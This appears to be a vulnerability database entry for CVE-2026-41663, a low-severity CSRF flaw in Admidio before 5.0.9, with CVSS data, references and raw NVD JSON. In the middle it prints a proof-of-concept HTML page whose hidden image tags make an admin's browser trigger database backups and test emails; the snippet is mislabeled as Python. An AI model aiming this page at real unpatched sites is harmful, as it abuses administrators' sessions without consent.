CVE-2026-41663

Description

Admidio is an open-source user management solution. Prior to version 5.0.9, several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because SameSite=Lax cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. This issue has been patched in version 5.0.9.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Admidio < 5.0.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-41663 -->
<!-- Attacker hosts this page and tricks the Admin into visiting it -->
<html>
  <body>
    <h1>You are being redirected...</h1>
    <!-- Example: Triggering Database Backup via GET -->
    <img src="http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=8" style="display:none;" />
    
    <!-- Example: Triggering Test Email via GET -->
    <img src="http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=9" style="display:none;" />
    
    <script>
      // Alternatively, force navigation using JS
      // window.location.href = "http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=8";
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41663
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41663
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41663/
[4] VulDB https://vuldb.com/cve/CVE-2026-41663
[5] https://github.com/Admidio/admidio/releases/tag/v5.0.9
[6] https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j
[7] https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41663", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:30.243", "lastModified": "2026-05-07T14:51:01.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because SameSite=Lax cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}